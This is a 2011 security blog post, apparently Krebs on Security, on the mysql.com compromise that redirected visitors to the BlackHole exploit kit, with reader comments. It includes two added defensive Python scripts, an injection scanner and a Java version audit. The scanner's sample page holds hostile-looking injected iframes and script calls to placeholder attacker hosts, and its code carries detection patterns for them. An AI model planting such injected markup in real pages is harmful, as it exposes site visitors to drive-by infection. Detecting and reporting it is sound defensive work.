A security firm revealed today that mysql.com, the central repository for widely-used Web database software, was hacked and booby-trapped to serve visitors with malicious software. The disclosure caught my eye because just a few days ago I saw evidence that administrative access to mysql.com was being sold in the hacker underground for just $3,000.
Web security firm Armorize stated in its blog that mysql.com was poisoned with a script that invisibly redirects visitors to a Web site that uses the BlackHole exploit pack, an automated exploit toolkit that probes visiting browsers for a variety of known security holes.
“It exploits the visitor’s browsing platform (the browser, the browser plugins like Adobe Flash, Adobe PDF, etc, Java, …), and upon successful exploitation, permanently installs a piece of malware into the visitor’s machine, without the visitor’s knowledge,” say the researchers. “The visitor doesn’t need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform will result in an infection.”
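As an added illustration (not part of this post and not Armorize's tooling), the following Python script shows how a site operator could scan the HTML their server is actually returning for the injection pattern described above: zero-size or hidden iframes, inline scripts that write an encoded iframe via `document.write(unescape(...))`, and script tags loaded from a host other than the site's own. The sample page, the hostnames in it and the `SITE_HOST` value are constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical: the host the scanned page legitimately belongs to.
SITE_HOST = "www.example-site.test"

# Constructed sample page: a normal download page with three injected pieces
# (hypothetical attacker hostnames). The YouTube embed is there as a benign,
# visible, off-site iframe that must NOT be flagged.
SAMPLE_HTML = """
<html><head><title>Downloads</title>
<script src="/js/site.js"></script>
<script>document.write(unescape('%3Ciframe src="http://evil.example/x.php" width=1 height=1%3E'));</script>
</head><body>
<p>Get the installer here.</p>
<script src="http://cdn.evil.example/a.js"></script>
<iframe src="http://bad.example/in.php" width="0" height="0" style="display:none"></iframe>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
</body></html>
"""

def _px(value):
    """Parse a width/height attribute such as '0', '1px' or '100%' to an int (None if absent)."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None

class RedirectFinder(HTMLParser):
    """Collects (kind, detail) findings for drive-by style injections."""

    # Inline-script patterns typical of obfuscated iframe injection.
    _SUSPICIOUS = [
        ("obfuscated-write", re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I)),
        ("encoded-iframe", re.compile(r"%3C\s*iframe", re.I)),
        ("charcode-eval", re.compile(r"eval\s*\(.*fromCharCode", re.I | re.S)),
    ]

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def _offsite(self, url):
        host = urlparse(url).netloc.lower()
        return bool(host) and host != self.site_host

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            style = (a.get("style") or "").replace(" ", "").lower()
            w, h = _px(a.get("width")), _px(a.get("height"))
            hidden = ("display:none" in style or "visibility:hidden" in style
                      or (w is not None and w <= 1) or (h is not None and h <= 1))
            if hidden:  # a frame the visitor cannot see has no legitimate reason to exist
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "script":
            self._in_script = True
            self._script_buf = []
            src = a.get("src")
            if src and self._offsite(src):  # review item: scripts pulled from elsewhere
                self.findings.append(("offsite-script", src))

    def handle_data(self, data):
        if self._in_script:  # HTMLParser hands script bodies to handle_data
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script_buf)
            for kind, pat in self._SUSPICIOUS:
                if pat.search(body):
                    self.findings.append((kind, body.strip()[:60]))
                    break

def find_injected_redirects(html_text, site_host=SITE_HOST):
    """Return the list of (kind, detail) findings for one HTML document."""
    p = RedirectFinder(site_host)
    p.feed(html_text)
    p.close()
    return p.findings

if __name__ == "__main__":
    for kind, detail in find_injected_redirects(SAMPLE_HTML):
        print(f"{kind:18} {detail}")
```

Run it against what the origin server serves and what a real browser fetches; a difference between the two is itself a signal. Off-site scripts are a review item rather than a verdict (CDNs are legitimate), so in practice that category is filtered through an allowlist of known hosts.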

A screenshot of a hacker on an exclusive Russian cybercrime forum selling root access to mysql.com for $3,000
Late last week, I was lurking on a fairly exclusive Russian hacker forum and stumbled upon a member selling root access to mysql.com. As part of his pitch, which was published on the criminal forum Sept. 21, the seller called attention to the site’s daily and monthly stats, and posted screen shots of a root login prompt in a bid to prove his wares.
The seller, ominously using the nickname “sourcec0de,” points out that mysql.com is a prime piece of real estate for anyone looking to plant an exploit kit: It boasts nearly 12 million visitors per month — almost 400,000 per day — and is ranked the 649th most-visited site by Alexa (Alexa currently rates it at 637).
He offered to sell remote access to the first person who paid him at least USD $3,000, via the site’s escrow service, which guarantees that both parties are satisfied with the transaction before releasing the funds.
The ultimate irony of this attack is that the owner of mysql.com is Oracle Corp., which also owns Java, a software suite that I have often advised readers to avoid due to its numerous security and update problems. As I’ve noted in several blog posts, Java exploits are the single most effective attacks used by exploit kits like BlackHole: Currently, four out of nine of the exploits built into BlackHole attack Java vulnerabilities.
Of course, the apparent criminal sale of mysql.com and the subsequent compromise of the site could be just a coincidence. Armorize’s Wayne Huang said the infection was cleaned up not long after the company published its blog post. Huang said it’s not clear how long mysql.com had been compromised, but that it appears the malicious scripts were injected into the site sometime within the last seven hours. If that’s accurate, that was enough time for approximately 120,000 Internet users to browse the site and expose their systems to the exploit kit.
“From our experience, the infection rate is usually pretty high for these drive-by download infections,” Huang said.
Armorize has published a YouTube video (below) that shows what happened when an unpatched browser visited mysql.com during the time it was infected with the drive-by exploit.
Update, Oct. 7, 12:30 a.m. ET: MySQL.com now features the following message, left on Oct. 4. “In light of a recent security incident, customers are advised to update their antivirus definitions and run a full antivirus scan on all computers that accessed the MySQL site between September 20th, 2011 and September 28th, 2011. Also, out of an abundance of caution, we advise MySQL account holders to then change their MySQL account passwords.”
Tags: Alexa, Armorize, java, mysql.com, sourcec0de, Wayne Huang
In the last paragraph, you state ‘unpatched browser’ but I think you mean ‘unpatched Java’. The video shows the use of a java exploit – which is likely independent of the browser.
Well, that’s one way of putting it. But nearly all of these exploit kit attacks target browser plugins, and this is no exception: Java is a standalone application, true, but it also hooks into the browser as a plugin.
I think in this example the JavaScript detected an unpatched version of the Java plugin and exploited a vulnerability that resides in the corresponding Java version/browser plugin. Most of those exploit kits have support for a variety of known vulnerabilities in browsers and browser plugins, Flash, (Adobe) PDF, etc.
RE: https://isc.sans.edu/diary.html?storyid=11638
Last Updated: 2011-09-26 21:50:32 UTC – “… now been cleaned up on mysql.com but no further words on the scope of the compromise. It also appears to be the second time this year*. In the last incident, SQL injection was used to gain access to the information on the site.”
* https://www.scmagazineus.com/oracles-mysqlcom-hacked-via-sql-injection/article/199419/
March 28, 2011
Use PDO
On this screenshot from the forum the date says
Thu Feb 11 UTC 2010
Jun 21 UTC 2010
Does it mean MySQL.com was compromised over a year and a half?
No, those dates are simply part of the kernel version string for each system, nothing to do with compromise.
No, that’s the date the kernel was built on that MySQL.com box (output from “uname -a”)
Look more closely at the screenshot, the thread was posted September 21, 2011 at 5:43 (and edited at 5:44).
To be fair, you’re right, but: we already do this anyway. The fundamental flaw is tied into the way browser architecture functions, with Java being the hardest to secure access route to those vulnerabilities. So, is it more sensational to say “Java is a security hole” or to say that “every browser you could use is a security hole?”
The real irony is we’re talking about an SQL venue here, because it’s in that same range of simply being a programming language that can be exploited with malicious intent as well.
John,
Did you happen to miss the part about how the Web site break in was used to install an exploit kit that exploited Java vulnerabilities more than any other? Not sure how you can say Java is irrelevant here.
Sorry about misspelling your name, Jon. So you’re a Java developer. I get it.
Just to more fully answer your question, here are the version release notes from the author of the BlackHole exploit kit. See if you can spot how many times he talks about new Java exploits. Finally, check out his sample stats page image to see what a moneymaker Java vulns have been for users of this exploit pack.
“The new version 1.1.0 of innovation – is a complete rewrite. Before issuing the java sploit, it is checking the version of JRE and only if the version is potentially vulnerable is an attempt [made] to punch through and overwrite existing exploits.
java smb no longer asks to install the plugin when approaching the link, and other changes (iepeers) removed because of no relevance
added 2 new exploit java trust (including breaks to 1.6.0_23 – this is the penultimate version at the moment). just added java skyline significantly increased breaking for some types of traffic nearly doubled, this is an example stats…”
http://img31.imageshack.us/img31/3900/screen110.gif
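The release notes quoted above say the kit checks the JRE version before it fires. The defender-side counterpart, added here as an example that is not from this post or from any Oracle tool, is an inventory check that parses Java version strings in the `1.6.0_23` form the note uses and flags hosts at or below a baseline. The baseline value, the hostnames and the sample inventory are constructed assumptions; the point it makes is that these strings must be compared numerically, since plain string ordering puts `1.6.0_9` above `1.6.0_23`.

```python
import re

def parse_java_version(s):
    """Parse '1.6.0_23', '1.6.0_29-b11' or '1.7.0' into a comparable (major, minor, patch, update) tuple."""
    m = re.match(r"\s*(\d+)\.(\d+)\.(\d+)(?:_(\d+))?", s)
    if not m:
        raise ValueError(f"unrecognised Java version string: {s!r}")
    major, minor, patch, update = m.groups()
    return (int(major), int(minor), int(patch), int(update or 0))

# Constructed assumption: treat anything at or below 1.6.0_23 as exposed, matching
# the quoted note's "breaks to 1.6.0_23". Replace with the current vendor baseline.
BASELINE = "1.6.0_23"

def exposed_hosts(inventory, baseline=BASELINE):
    """Return hostnames whose JRE is at or below the baseline, oldest version first."""
    base = parse_java_version(baseline)
    hits = []
    for host, version in inventory.items():
        parsed = parse_java_version(version)
        if parsed <= base:  # tuple comparison, so 1.6.0_9 < 1.6.0_23 as intended
            hits.append((parsed, host))
    return [host for _, host in sorted(hits)]

# Constructed sample inventory (hypothetical hostnames), as a patch tool might export it.
SAMPLE_INVENTORY = {
    "ws-101": "1.6.0_23",
    "ws-102": "1.6.0_26",
    "ws-103": "1.5.0_22",
    "ws-104": "1.7.0",
    "ws-105": "1.6.0_9",
}

if __name__ == "__main__":
    for host in exposed_hosts(SAMPLE_INVENTORY):
        print(f"{host}: JRE {SAMPLE_INVENTORY[host]} is at or below {BASELINE}")
```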
Nothing good to say… Java is slow… I haven’t installed that in many years… even… if I had to… I always removed it… that’s a piece of software that I really… dislike…
…was that really you lurking the site? http://blog.trendmicro.com/underground-radar-possible-compromise-of-mysql-com-and-its-subdomains/
Hrm. Jonathan, what are you suggesting?
For Jon, and any other doubters:
http://krebsonsecurity.com/wp-content/uploads/2011/09/mysqlrootforsale0.png
Looks like they are arguing a bit in the thread:
http://img824.imageshack.us/img824/3219/unledweuw.png
“The reality is that *all* you are talking about is Applets and maybe a bit of the Java WebStart crap. Both of which are effectively dead technology.”
I couldn’t agree more. Unfortunately, this “crap,” “dead” technology is installed on about 80 percent of the computers out there today, even if most people have zero need for it.
Most users aren’t interested in the philosophical and emotional debate you’re having with yourself about what parts of Java are fun and great and which parts aren’t. The average user installs Java and forgets about it.
We can blame Sun for how insecure it has been, and Microsoft for not building a better operating system, but that doesn’t change the fact that the Java program that users have on their systems is a huge liability for non-security conscious users, which describes a majority of the planet, I’m afraid.
“good ol’ morals and laws, where are thou” Summarily dismissed as soon as the evidence became compelling that it didn’t work? I’m not interested in a moronic, “bring back hanging” argument. There is so much evidence both by comparing countries today and using historical data that anyone who thinks capital punishment works is, at best, deluded and, at worst, mentally deluded.
idiot
You should move to Saudi-Arabia
Great article as always. Just figuring out if the Armorize File Monitor was available somewhere to download. Does anyone know?
Thanks
They didn’t say that they were using a VM, but please note that a tool like Armorize (or Sysinternals’ procmon – http://technet.microsoft.com/en-us/sysinternals/bb896645 ) won’t protect your system from being ruined. It just lets you see things as they happen until the bad actor starts running, at which point it could stomp all over Armorize or anything else running on the system (well, generally anyway, a privilege escalation attack might be needed to do it completely, but …).
Personally, if I were going to play with fire like this, I’d snapshot a VM and use that, and I’d probably also ensure that the VM host has no privileges and isn’t connected to any private networks. (Yes, you can attack a VM host just as you can attack an OS or a local network, there might be fewer attacks available, but it only takes one.)
I use a VM on linux for this very purpose. I can let a trojan in, disassemble it, and/or let it loose, and then restore the machine back to before it was smashed.
Very handy to get a bunch of tools installed and you always have a clean snapshot ready to go for the next round.
I did something like this when I was quite young (486 era) and had an extra computer that I would just let viruses loose on to see what they did. It was a bitch to have to format and reinstall the OS every time though haha.
Brian, 2 minutes of googling and…
this root was being sold on 5 or more forums for 1 week!!!
http://forum.antichat.ru/showthread.php?p=2837158
etc
Oracle did nothing all this time!
What I find frustrating with articles like this one is that it is difficult to know who is vulnerable. Are browsers with Java running on Linux vulnerable? From the Armorize video it appears that the Blackhole exploit pack targets Windows since the video shows .exe files being dropped. But is Blackhole context sensitive, attacking Linux when the victim is running that O/S? It would be really helpful if authors would at least say something about the scope of configurations that can be victimized. Even to say that it is not known whether Linux or Apple or whatever machines are vulnerable would be helpful.
BlackHole, and this attack in general, targets Windows users only.
What is frustrating is that you frequent a BLOG like this and expect Brian to educate you in facets of his BLOG entry. Read from his blog and then research the things you don’t understand. He provides pertinent links to assist with this.
Matter of time… More and more people with inside access will start doing this, I am afraid. Cyber-war is imminent. And nation-states have enough money to create moles and get what they want. That is what happened with the case of mysql.com… That much access to a repository with that much security… Has to be inside…
It is sad how exploitable Java is…Hell, I can create a drive-by link to inject a payload in about 30 seconds… That is how bad java is… It needs to die… Fast.
poor Oracle. tsk tsk tsk…
Very good article and Video! Thank you.
Good video, well done hackers! Shame they can’t put their skills to something more constructive.
Windows has always been vulnerable and it always will be. The key here is that a binary file can be downloaded and executed without the user’s permission. That is ludicrous. Windows basically does not work!
I agree, great article. Frankos, I think there is a different side, but I’m not going to debate on hackers anymore. I don’t condone what they do. I am just saying the mindset in many ways is different. Because they don’t come out and hold interviews. It’s illegal and wrong. But there are those being paid. They are the ones being paid by companies to do such things. If people want this to stop, then rein in the companies paying them. Patents aren’t the only thing used in corporate warfare. Economic espionage is very prevalent. Cracking is part of that approach. It’s unfortunate but it’s happening.
Thanks for the update Brian, I really enjoy reading your blog. It is clear that trusted websites such as mysql.com that involve downloads, no one can be sure of the validity of the links. Organizations need to ensure their network is secured with a network layer Data Leakage Prevention (DLP), which is fast becoming a necessity to prevent the breach of user/corporate data. Any enterprise that captures and distributes data and/or plug-ins needs to become hyper-vigilant. Our company, Wedge Networks has focused on building such solutions for years, and is leading efforts to prevent the good things from flowing out, but especially in this case, prevent bad things from flowing in.
I’d like to thank Wayne Huang for his efforts, and the video, and of course, Brian for bringing it to our attention!